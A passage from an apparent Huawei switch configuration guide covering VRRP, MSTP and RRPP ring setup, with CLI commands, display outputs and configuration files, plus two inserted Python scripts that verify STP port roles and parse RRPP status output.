[SwitchA-Vlanif2] vrrp vrid 1 virtual-ip 10.1.2.100 //Create VRRP group 1 and set the virtual IP address to 10.1.2.100.
[SwitchA-Vlanif2] vrrp vrid 1 priority 120 //Set the priority of VRRP group 1 to 120.
[SwitchA-Vlanif2] vrrp vrid 1 preempt-mode timer delay 20 //Set the preemption delay of VRRP group 1 to 20s.
[SwitchA-Vlanif2] quit
[SwitchB] interface vlanif 2
[SwitchB-Vlanif2] vrrp vrid 1 virtual-ip 10.1.2.100 //Create VRRP group 1 and set the virtual IP address to 10.1.2.100.
[SwitchB-Vlanif2] quit

# Configure VRRP group 2 on SwitchA and SwitchB, set the priority of SwitchB to 120 and
the preemption delay to 20s, and set the default priority for SwitchA.
[SwitchB] interface vlanif 3
[SwitchB-Vlanif3] vrrp vrid 2 virtual-ip 10.1.3.100 //Create VRRP group 2 and set the virtual IP address to 10.1.3.100.
[SwitchB-Vlanif3] vrrp vrid 2 priority 120 //Set the priority of VRRP group 2 to 120.
[SwitchB-Vlanif3] vrrp vrid 2 preempt-mode timer delay 20 //Set the preemption delay of VRRP group 2 to 20s.
[SwitchB-Vlanif3] quit
[SwitchA] interface vlanif 3
[SwitchA-Vlanif3] vrrp vrid 2 virtual-ip 10.1.3.100 //Create VRRP group 2 and set the virtual IP address to 10.1.3.100.
[SwitchA-Vlanif3] quit

# Set virtual IP address 10.1.2.100 of VRRP group 1 as the default gateway of HostA, and
virtual IP address 10.1.3.100 of VRRP group 2 as the default gateway of HostB.
Step 7 Verify the configuration.
# After the configuration is complete, run the display vrrp command on SwitchA. You can
see that SwitchA is the master in VRRP group 1 and the backup in VRRP group 2.
[SwitchA] display vrrp
Vlanif2 | Virtual Router 1
State : Master
Virtual IP : 10.1.2.100
Master IP : 10.1.2.102
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

Vlanif3 | Virtual Router 2
State : Backup
Virtual IP : 10.1.3.100
Master IP : 10.1.3.103
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:40:18
Last change time : 2012-05-26 11:48:58

# After the configuration is complete, run the display vrrp command on SwitchB. You can
see that SwitchB is the backup in VRRP group 1 and the master in VRRP group 2.
[SwitchB] display vrrp
Vlanif2 | Virtual Router 1
State : Backup
Virtual IP : 10.1.2.100
Master IP : 10.1.2.102
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:39:18
Last change time : 2012-05-26 11:38:58

Vlanif3 | Virtual Router 2
State : Master
Virtual IP : 10.1.3.100
Master IP : 10.1.3.103
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 20 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0102
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2012-05-11 11:40:18
Last change time : 2012-05-26 11:48:58

----End
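
As an added check that is not part of the Huawei document, the script below recomputes, for MSTI 1 and MSTI 2, the root bridge and the role of every ring port from the priorities and path costs configured in Steps 1 to 3, so the result can be compared with the display stp brief outputs of Step 4. It assumes that root primary sets bridge priority 0 and root secondary sets 4096 (other bridges keep 32768), that a GE port has Huawei legacy path cost 20, and that the ring links are wired as the Step 4 outputs imply; the MAC addresses are constructed tiebreakers.

```python
"""Per-MSTI root bridge and port-role computation for the MSTP ring above.

Added example; it is not part of the Huawei document. It recomputes, for MSTI 1
and MSTI 2, the root bridge, each bridge's root path cost and the role of every
ring port from the priorities and path costs configured in Steps 1 to 3, so the
result can be compared with the 'display stp brief' outputs of Step 4.
Assumptions (not stated on the page): 'root primary' sets bridge priority 0 and
'root secondary' 4096, other bridges keep 32768; a GE port has Huawei legacy path
cost 20; the link layout is inferred from the Step 4 outputs; the MAC addresses
are constructed tiebreakers.
"""
import heapq

ROOT_PRIMARY, ROOT_SECONDARY, DEFAULT_PRIO = 0, 4096, 32768  # assumed priorities
LEGACY_GE_COST = 20                                          # assumed legacy GE cost

# Bridge priority per MSTI as configured in Step 2 (constructed MACs break ties).
BRIDGES = {
    "SwitchA": {"mac": "0001-0000-000a", 1: ROOT_PRIMARY, 2: ROOT_SECONDARY},
    "SwitchB": {"mac": "0001-0000-000b", 1: ROOT_SECONDARY, 2: ROOT_PRIMARY},
    "SwitchC": {"mac": "0001-0000-000c", 1: DEFAULT_PRIO, 2: DEFAULT_PRIO},
}

# Ring links as (bridge, port, bridge, port), inferred from the Step 4 outputs:
# GE1/0/2 on SwitchA and GE1/0/2 on SwitchB are the root ports toward each other.
LINKS = [
    ("SwitchA", "GE1/0/1", "SwitchC", "GE1/0/1"),
    ("SwitchA", "GE1/0/2", "SwitchB", "GE1/0/2"),
    ("SwitchB", "GE1/0/1", "SwitchC", "GE1/0/4"),
]

# The 'stp instance N cost 20000' settings of Step 3, keyed by (bridge, port, MSTI).
COST_OVERRIDE = {("SwitchC", "GE1/0/1", 2): 20000, ("SwitchC", "GE1/0/4", 1): 20000}


def port_cost(bridge, port, msti):
    """Path cost of a port in one MSTI: the configured override, else the GE default."""
    return COST_OVERRIDE.get((bridge, port, msti), LEGACY_GE_COST)


def compute_roles(msti):
    """Return (root bridge, root path cost per bridge, role per (bridge, port))."""
    bid = {name: (b[msti], b["mac"]) for name, b in BRIDGES.items()}  # lower wins
    root = min(bid, key=bid.get)
    adj = {name: [] for name in BRIDGES}
    for a, ap, b, bp in LINKS:
        adj[a].append((ap, b, bp))
        adj[b].append((bp, a, ap))
    # Dijkstra from the root. A BPDU received on port 'vport' of bridge 'v' carries the
    # sender's root path cost; 'v' adds the cost of its receiving port. Ties are broken
    # by the sender's bridge ID, then by the receiving port, as in the MSTP priority vector.
    best = {root: (0, bid[root], "")}
    root_port = {}
    heap = [(0, bid[root], root)]
    while heap:
        cost, _, u = heapq.heappop(heap)
        if cost > best[u][0]:
            continue  # stale heap entry
        for _uport, v, vport in adj[u]:
            cand = (cost + port_cost(v, vport, msti), bid[u], vport)
            if v not in best or cand < best[v]:
                best[v] = cand
                root_port[v] = vport
                heapq.heappush(heap, (cand[0], bid[v], v))
    rpc = {name: vec[0] for name, vec in best.items()}
    roles = {}
    for a, ap, b, bp in LINKS:
        # The end with the lower (root path cost, bridge ID) is designated on the link;
        # the other end is the root port if that is its best path, otherwise alternate.
        if (rpc[a], bid[a]) < (rpc[b], bid[b]):
            desi, other = (a, ap), (b, bp)
        else:
            desi, other = (b, bp), (a, ap)
        roles[desi] = "DESI"
        roles[other] = "ROOT" if root_port.get(other[0]) == other[1] else "ALTE"
    return root, rpc, roles


def blocked_ports(msti):
    """Ports that discard in this MSTI (alternate role), sorted for stable comparison."""
    return sorted(port for port, role in compute_roles(msti)[2].items() if role == "ALTE")


def load_balanced():
    """True when MSTI 1 and MSTI 2 block different ports, so both ring links carry traffic."""
    return set(blocked_ports(1)).isdisjoint(blocked_ports(2))


if __name__ == "__main__":
    for msti in (1, 2):
        root, rpc, roles = compute_roles(msti)
        print(f"MSTI {msti}: root bridge {root}, blocked {blocked_ports(msti)}")
        for (bridge, port), role in sorted(roles.items()):
            print(f"  {bridge} {port}: {role} (root path cost {rpc[bridge]})")
```

The roles it derives match the Step 4 outputs: SwitchC blocks GE1/0/4 in MSTI 1 and GE1/0/1 in MSTI 2, so VLAN 2 and VLAN 3 traffic take different ring links.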

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 2 to 4
#
stp instance 1 root primary
stp instance 2 root secondary
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
active region-configuration
#
interface Vlanif2
ip address 10.1.2.102 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.2.100
vrrp vrid 1 priority 120
vrrp vrid 1 preempt-mode timer delay 20
#
interface Vlanif3
ip address 10.1.3.102 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.3.100
#
interface Vlanif4
ip address 10.1.4.102 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 3
stp root-protection
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 4
stp bpdu-filter enable
stp edged-port enable
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.4.0 0.0.0.255
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 2 to 3 5
#
stp instance 1 root secondary
stp instance 2 root primary
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
active region-configuration
#
interface Vlanif2
ip address 10.1.2.103 255.255.255.0
vrrp vrid 1 virtual-ip 10.1.2.100
#
interface Vlanif3
ip address 10.1.3.103 255.255.255.0
vrrp vrid 2 virtual-ip 10.1.3.100
vrrp vrid 2 priority 120
vrrp vrid 2 preempt-mode timer delay 20
#
interface Vlanif5
ip address 10.1.5.103 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 3
stp root-protection
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk allow-pass vlan 2 to 3
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 5
stp bpdu-filter enable
stp edged-port enable
#
ospf 1
area 0.0.0.0
network 10.1.2.0 0.0.0.255
network 10.1.3.0 0.0.0.255
network 10.1.5.0 0.0.0.255
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 2 to 3
#
stp pathcost-standard legacy
#
stp region-configuration
region-name RG1
instance 1 vlan 2
instance 2 vlan 3
active region-configuration
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk allow-pass vlan 2 to 3
stp instance 2 cost 20000
#
interface GigabitEthernet1/0/2
port link-type access
port default vlan 2
stp bpdu-filter enable
stp edged-port enable
#
interface GigabitEthernet1/0/3
port link-type access
port default vlan 3
stp bpdu-filter enable
stp edged-port enable
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 2 to 3
stp instance 1 cost 20000
#
return

7.5 Example for Configuring a Single RRPP Ring with a Single Instance

RRPP Overview
In most situations, the ring network topology is applied to MANs and enterprise networks to
improve network reliability. When a fault occurs on a node or on a link between nodes, data
services are switched to the standby link to ensure nonstop services. However, broadcast
storms may occur on a ring network.
Many protocols can prevent broadcast storms on ring networks. However, if a fault occurs on
a ring network, it takes some time for the devices to switch data services to the standby link.
If the convergence takes too much time, services are interrupted.
To shorten the convergence time and eliminate the impact of network scale on convergence
time, Huawei developed the Rapid Ring Protection Protocol (RRPP). Compared with other
Ethernet ring technologies, RRPP has the following advantages:
l RRPP applies to networks composed of many network nodes because the convergence
time is not affected by the number of nodes on the ring network.
l RRPP prevents broadcast storms caused by data loops when an Ethernet ring is
complete.
l When a link on an Ethernet ring network fails, the standby link can rapidly restore the
communication among the Ethernet ring network nodes.

Configuration Notes
l STP and Smart Link must be disabled on the interface added to an RRPP domain.
l DHCP and MAC address limiting rules cannot be configured in an RRPP control VLAN.
l When the mapping between the protected instance and MUX VLAN needs to be
configured, you are advised to configure the principal VLAN, subordinate group VLAN,
and subordinate separate VLAN in the MUX VLAN in the protected instance.
Otherwise, loops may occur.
l This example applies to all versions and products.

Networking Requirements
As shown in Figure 7-5, SwitchA, SwitchB, and SwitchC constitute a ring network. The
network is required to prevent loops when the ring is complete and to implement fast
convergence to rapidly restore communication between nodes in the ring when the ring fails.
You can enable RRPP on SwitchA, SwitchB, and SwitchC to meet this requirement.

Figure 7-5 Networking of a single RRPP ring
[Figure: SwitchA, SwitchB, and SwitchC are connected in Ring 1 through GE2/0/1 and GE2/0/2 on each switch. The legend distinguishes the primary interface from the secondary interface of each node.]

Configuration Roadmap
The configuration roadmap is as follows:

1. Create an RRPP domain and its control VLAN.
2. Map the VLANs whose data passes through the RRPP ring to instance 1, including data
VLANs 100 to 300 and control VLANs 20 and 21 (VLAN 21 is the sub-control VLAN
generated by the device).
3. Configure interfaces to be added to the RRPP domain on the devices so that data can
pass through the interfaces. Disable protocols that conflict with RRPP, such as STP.
4. In the RRPP domain, configure a protected VLAN, create an RRPP ring and configure
SwitchA, SwitchB, and SwitchC as nodes in ring 1 in domain 1. Configure SwitchA as
the master node in ring 1 and configure SwitchB and SwitchC as transit nodes in ring 1.
5. Enable the RRPP ring and RRPP on devices.

Procedure
Step 1 Create an RRPP domain and its control VLAN.

# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.

<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] rrpp domain 1
[SwitchA-rrpp-domain-region1] control-vlan 20 //Each RRPP domain has a major control VLAN and a sub-control VLAN. You only need to specify the major control VLAN. The system uses the VLAN whose ID is one greater than the ID of the major control VLAN as the sub-control VLAN.
[SwitchA-rrpp-domain-region1] quit

Step 2 Map instance 1 to control VLANs 20 and 21 and data VLANs 100 to 300.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] vlan batch 100 to 300
[SwitchA] stp region-configuration
[SwitchA-mst-region] instance 1 vlan 20 21 100 to 300 //Add the major control VLAN, sub-control VLAN, and data VLANs to instance 1.
[SwitchA-mst-region] active region-configuration
[SwitchA-mst-region] quit

Step 3 Configure the interfaces to be added to the RRPP ring as trunk interfaces, configure the
interfaces to allow VLANs 100 to 300 to pass through, and disable STP on the interfaces.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] interface gigabitethernet 2/0/1
[SwitchA-GigabitEthernet2/0/1] port link-type trunk
[SwitchA-GigabitEthernet2/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet2/0/1] port trunk allow-pass vlan 100 to 300
[SwitchA-GigabitEthernet2/0/1] stp disable
[SwitchA-GigabitEthernet2/0/1] quit
[SwitchA] interface gigabitethernet 2/0/2
[SwitchA-GigabitEthernet2/0/2] port link-type trunk
[SwitchA-GigabitEthernet2/0/2] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet2/0/2] port trunk allow-pass vlan 100 to 300
[SwitchA-GigabitEthernet2/0/2] stp disable
[SwitchA-GigabitEthernet2/0/2] quit

Step 4 Specify a protected VLAN, and create and enable an RRPP ring.
# Configure SwitchA.
[SwitchA] rrpp domain 1
[SwitchA-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure instance 1 as the protected instance of the RRPP domain.
[SwitchA-rrpp-domain-region1] ring 1 node-mode master primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0 //Configure SwitchA as the master node of ring 1, with GE2/0/1 as the primary port and GE2/0/2 as the secondary port.
[SwitchA-rrpp-domain-region1] ring 1 enable
[SwitchA-rrpp-domain-region1] quit

# Configure SwitchB.
[SwitchB] rrpp domain 1
[SwitchB-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchB-rrpp-domain-region1] ring 1 node-mode transit primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0 //Configure SwitchB as a transit node of ring 1.
[SwitchB-rrpp-domain-region1] ring 1 enable
[SwitchB-rrpp-domain-region1] quit

# Configure SwitchC.
[SwitchC] rrpp domain 1
[SwitchC-rrpp-domain-region1] protected-vlan reference-instance 1
[SwitchC-rrpp-domain-region1] ring 1 node-mode transit primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0 //Configure SwitchC as a transit node of ring 1.
[SwitchC-rrpp-domain-region1] ring 1 enable
[SwitchC-rrpp-domain-region1] quit

Step 5 Enable RRPP.
# Configure SwitchA. The configurations of SwitchB and SwitchC are similar to the
configuration of SwitchA, and are not mentioned here. For details, see the configuration files.
[SwitchA] rrpp enable

Step 6 Verify the configuration.
After the configuration is complete and the network topology becomes stable, perform the
following operations to verify the configuration. The display on SwitchA is used as an
example.
# Run the display rrpp brief command on SwitchA. The following information is displayed:
[SwitchA] display rrpp brief
Abbreviations for Switch Node Mode :
M - Master , T - Transit , E - Edge , A - Assistant-Edge

RRPP Protocol Status: Enable
RRPP Working Mode: HW
RRPP Linkup Delay Timer: 0 sec (0 sec default)
Number of RRPP Domains: 1

Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

Ring  Ring   Node  Primary/Common        Secondary/Edge        Is
ID    Level  Mode  Port                  Port                  Enabled
----------------------------------------------------------------------------
1     0      M     GigabitEthernet2/0/1  GigabitEthernet2/0/2  Yes

According to the preceding information, RRPP is enabled on SwitchA; the major control
VLAN of RRPP domain 1 is VLAN 20 and the sub-control VLAN is VLAN 21; SwitchA is
the master node in ring 1; the primary interface is GigabitEthernet2/0/1 and the secondary
interface is GigabitEthernet2/0/2.
# Run the display rrpp verbose domain command on SwitchA. The following information is
displayed:
[SwitchA] display rrpp verbose domain 1
Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Ring State : Complete
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet2/0/1 Port status: UP
Secondary port : GigabitEthernet2/0/2 Port status: BLOCKED

The command output shows that the RRPP ring is complete.

----End
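
As an added example that is not part of the Huawei document, the script below parses display rrpp verbose domain output of the form shown in Step 6 and applies two consistency checks: the sub-control VLAN must be the major control VLAN plus one, and a master node whose ring is Complete must keep its secondary port BLOCKED (a Complete ring with the secondary port UP would mean both links forward, which is the loop RRPP exists to prevent). The sample outputs are constructed from the Step 6 output; the Failed-ring and loop-risk variants are assumptions used to exercise the checks.

```python
"""Consistency check over 'display rrpp verbose domain' output.

Added example, not from the Huawei document. The first sample reproduces the
Step 6 output; the other two are constructed variants (assumptions): a ring after
a link break, and a master whose secondary port forwards although the ring is
Complete. Only the master node blocks a port, so transit nodes are skipped.
"""
import re

SAMPLE_COMPLETE = """\
Domain Index : 1
Control VLAN : major 20 sub 21
Protected VLAN : Reference Instance 1
Hello Timer : 1 sec(default is 1 sec) Fail Timer : 6 sec(default is 6 sec)

RRPP Ring : 1
Ring Level : 0
Node Mode : Master
Ring State : Complete
Is Enabled : Enable Is Active: Yes
Primary port : GigabitEthernet2/0/1 Port status: UP
Secondary port : GigabitEthernet2/0/2 Port status: BLOCKED
"""
# Constructed: the same ring after a link break; the master opens its secondary port.
SAMPLE_FAILED = SAMPLE_COMPLETE.replace("Ring State : Complete", "Ring State : Failed") \
                               .replace("Port status: BLOCKED", "Port status: UP")
# Constructed: an inconsistent master, ring Complete yet secondary port forwarding.
SAMPLE_LOOP_RISK = SAMPLE_COMPLETE.replace("Port status: BLOCKED", "Port status: UP")

_DOMAIN_RE = re.compile(r"Domain Index\s*:\s*(\d+)")
_CTRL_RE = re.compile(r"Control VLAN\s*:\s*major\s+(\d+)\s+sub\s+(\d+)")
_RING_RE = re.compile(r"RRPP Ring\s*:\s*(\d+)")
_FIELD_RE = re.compile(r"(Ring Level|Node Mode|Ring State)\s*:\s*(\S+)")
_PORT_RE = re.compile(r"(Primary|Secondary) port\s*:\s*(\S+)\s+Port status:\s*(\S+)")


def parse_rrpp_verbose(text):
    """Return (domain dict, list of ring dicts) from one 'display rrpp verbose' output."""
    domain, rings, ring = {}, [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = _RING_RE.match(line)
        if m:                                   # a new ring block starts
            ring = {"ring": int(m.group(1))}
            rings.append(ring)
            continue
        if ring is None:                        # still in the domain header
            m = _DOMAIN_RE.match(line)
            if m:
                domain["domain"] = int(m.group(1))
            m = _CTRL_RE.match(line)
            if m:
                domain["major"], domain["sub"] = int(m.group(1)), int(m.group(2))
            continue
        m = _PORT_RE.match(line)
        if m:
            ring[m.group(1).lower()] = {"port": m.group(2), "status": m.group(3)}
            continue
        m = _FIELD_RE.match(line)
        if m:
            ring[m.group(1)] = m.group(2)
    return domain, rings


def rrpp_findings(text):
    """Return human-readable findings; an empty list means the output is consistent."""
    domain, rings = parse_rrpp_verbose(text)
    findings = []
    # The device derives the sub-control VLAN as major control VLAN + 1.
    if domain.get("sub") != domain.get("major", -1) + 1:
        findings.append(f"domain {domain.get('domain')}: sub-control VLAN is not major + 1")
    for r in rings:
        if r.get("Node Mode") != "Master":
            continue                            # only the master blocks a port
        state = r.get("Ring State")
        sec = r.get("secondary", {}).get("status")
        if state == "Complete" and sec != "BLOCKED":
            findings.append(f"ring {r['ring']}: Complete but secondary port is {sec}, loop risk")
        if state == "Failed" and sec != "UP":
            findings.append(f"ring {r['ring']}: Failed but secondary port is {sec}, no redundancy")
    return findings


if __name__ == "__main__":
    for name, sample in [("complete", SAMPLE_COMPLETE), ("failed", SAMPLE_FAILED),
                         ("loop-risk", SAMPLE_LOOP_RISK)]:
        print(name, rrpp_findings(sample) or "OK")
```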

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 20 to 21 100 to 300
#
rrpp enable
#
stp region-configuration
instance 1 vlan 20 to 21 100 to 300
active region-configuration
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode master primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 1 enable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
return
l Configuration file of SwitchB
#
sysname SwitchB
#
vlan batch 20 to 21 100 to 300
#
rrpp enable
#
stp region-configuration
instance 1 vlan 20 to 21 100 to 300
active region-configuration
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 1 enable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
return
l Configuration file of SwitchC
#
sysname SwitchC
#
vlan batch 20 to 21 100 to 300
#
rrpp enable
#
stp region-configuration
instance 1 vlan 20 to 21 100 to 300
active region-configuration
#
rrpp domain 1
control-vlan 20
protected-vlan reference-instance 1
ring 1 node-mode transit primary-port GigabitEthernet2/0/1 secondary-port GigabitEthernet2/0/2 level 0
ring 1 enable
#
interface GigabitEthernet2/0/1
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
interface GigabitEthernet2/0/2
port link-type trunk
undo port trunk allow-pass vlan 1
port trunk allow-pass vlan 20 to 21 100 to 300
stp disable
#
return

Relevant Information
Video
Configure RRPP

7.6 Example for Configuring Tangent RRPP Rings

Tangent RRPP Ring
Generally, a metro Ethernet network uses two-layer rings:
l One layer is the aggregation layer between aggregation devices PE-AGGs, for example,
RRPP domain 1 in Figure 7-6.
l The other layer is the access layer between PE-AGGs and UPEs, for example, RRPP
domain 2 and RRPP domain 3 in Figure 7-6.
As shown in Figure 7-6, intersecting RRPP rings can be used. RRPP rings are configured at
aggregation and access layers, and the two layers are connected through tangent RRPP rings.


Figure 7-6 Tangent RRPP rings
[Figure: RRPP Domain 1 is the aggregation ring formed by PE-AGG1 (master, with primary port P and blocked secondary port S), PE-AGG3 (transit 1) and PE-AGG2 (transit 2), which connect through NPEs to the IP/MPLS core. RRPP Domain 2 (UPE1 as master, UPE2 and PE-AGG3) and RRPP Domain 3 (UPEs and PE-AGG2, with a UPE as master) are access rings tangent to Domain 1 at PE-AGG3 and PE-AGG2. LAN switches, CEs, DSLAMs and UMGs attach to the UPEs. Legend: PE-AGG: PE-Aggregation; NPE: Network Provider Edge; UMG: Universal Media Gateway; UPE: Underlayer Provider Edge; DSLAM: Digital Subscriber Line Access Multiplexer.]

Two tangent rings cannot belong to the same RRPP domain. The tangent point of the two
rings belongs to both RRPP domains, and the master node can be located at the tangent point.
When there are multiple tangent RRPP rings, a fault in one ring does not affect the other
domains, and the convergence process of the RRPP rings in a domain is the same as that of a
single ring.

Configuration Notes
l STP and Smart Link must be disabled on the interface added to an RRPP domain.
l DHCP and MAC address limiting rules cannot be configured in an RRPP control VLAN.
l When the mapping between the protected instance and MUX VLAN needs to be
configured, you are advised to configure the principal VLAN, subordinate group VLAN,
and subordinate separate VLAN in the MUX VLAN in the protected instance.
Otherwise, loops may occur.
l This example applies to all versions and products.

Networking Requirements
As shown in Figure 7-6, the network is required to prevent loops when the ring is complete
and to implement fast convergence to rapidly restore communication between nodes in the
ring when the ring fails. RRPP can meet this requirement. RRPP supports multiple rings. You
can configure RRPP rings at the aggregation and access layers. The two rings are tangent,
simplifying the network configuration.
SwitchE, SwitchD, SwitchC, SwitchA, and SwitchB in Figure 7-7 map PE-AGG1, PE-
AGG2, PE-AGG3, UPE1, and UPE2 in Figure 7-6 respectively. Figure 7-7 is used as an
example to describe how to configure tangent RRPP rings with a single instance.


Figure 7-7 Networking of tangent RRPP rings
[Figure: Domain 2 / Ring 2 is formed by SwitchA, SwitchB and SwitchC on their GE2/0/1 and GE2/0/2 interfaces; Domain 1 / Ring 1 is formed by SwitchC, SwitchD and SwitchE on their GE1/0/1 and GE1/0/2 interfaces. SwitchC is the tangent point of the two rings.]

Configuration Roadmap
The configuration roadmap is as follows:
1. Create RRPP domains and control VLANs for configuring RRPP rings.
2. Map the VLANs that need to pass through ring 1 to instance 1, including data VLANs
and control VLANs, which are used for configuring protected VLANs.
Map the VLANs that need to pass through ring 2 to instance 2, including data VLANs
and control VLANs, which are used for configuring protected VLANs.
3. Configure interfaces to be added to the RRPP domain on the devices so that data can
pass through the interfaces. Disable protocols that conflict with RRPP, such as STP.
4. Configure protected VLANs and create RRPP rings in RRPP domains.
a. Configure SwitchA, SwitchB, and SwitchC to be in ring 2 of RRPP domain 2.
b. Configure SwitchC, SwitchD, and SwitchE to be in ring 1 of RRPP domain 1.
c. Configure SwitchA as the master node in ring 2, and configure SwitchB and
SwitchC as transit nodes in ring 2.
d. Configure SwitchE as the master node in ring 1, and configure SwitchC and
SwitchD as transit nodes in ring 1.
5. Enable the RRPP ring and RRPP on devices.

Procedure
Step 1 Configure instance 2 and map it to the data VLANs and control VLANs allowed by the RRPP
interface.
# Configure SwitchA. The configurations of SwitchB, SwitchC, SwitchD, and SwitchE are
similar to the configuration of SwitchA, and are not mentioned here. For details, see the
configuration files.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] stp region-configuration
[SwitchA-mst-region] instance 2 vlan 20 to 21 //Add the major control VLAN and sub-control VLAN to instance 2.
[SwitchA-mst-region] active region-configuration
[SwitchA-mst-region] quit

Step 2 Create RRPP domains and configure control VLANs and protected VLANs of the RRPP
domains.


# Configure SwitchE. The configurations of SwitchA, SwitchB, SwitchC, and SwitchD are
similar to the configuration of SwitchE, and are not mentioned here. For details, see the
configuration files.
[SwitchE] rrpp domain 1
[SwitchE-rrpp-domain-region1] control-vlan 10 //Each RRPP domain has a major control VLAN and a sub-control VLAN. You only need to specify the major control VLAN. The system uses the VLAN whose ID is one greater than the ID of the major control VLAN as the sub-control VLAN.
[SwitchE-rrpp-domain-region1] protected-vlan reference-instance 1 //Configure instance 1 as the protected instance of the RRPP domain.
[SwitchE-rrpp-domain-region1] quit

Step 3 Configure the interfaces to be added to RRPP rings as trunk interfaces and disable STP on the
interfaces.

# Configure SwitchA. The configurations of SwitchB, SwitchC, SwitchD, and SwitchE are
similar to the configuration of SwitchA, and are not mentioned here. For details, see the
configuration files.
[SwitchA] interface gigabitethernet 2/0/1
[SwitchA-GigabitEthernet2/0/1] port link-type trunk
[SwitchA-GigabitEthernet2/0/1] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet2/0/1] stp disable
[SwitchA-GigabitEthernet2/0/1] quit
[SwitchA] interface gigabitethernet 2/0/2
[SwitchA-GigabitEthernet2/0/2] port link-type trunk
[SwitchA-GigabitEthernet2/0/2] undo port trunk allow-pass vlan 1
[SwitchA-GigabitEthernet2/0/2] stp disable
[SwitchA-GigabitEthernet2/0/2] quit

Step 4 Create and enable the RRPP ring.


l Configure nodes in ring 2.
# Configure SwitchA as the master node in ring 2 and specify the primary and secondary
interfaces.
[SwitchA] rrpp domain 2
[SwitchA-rrpp-domain-region2] ring 2 node-mode master primary-port gigabitethernet 2/0/1 secondary-port gigabitethernet 2/0/2 level 0
[SwitchA-rrpp-domain-region2] ring 2 enable
[SwitchA-rrpp-domain-region2] quit

# Configure SwitchB as a transit node in ring 2 (major ring) and specify the primary and
secondary interfaces.
[SwitchB] rrpp domain 2
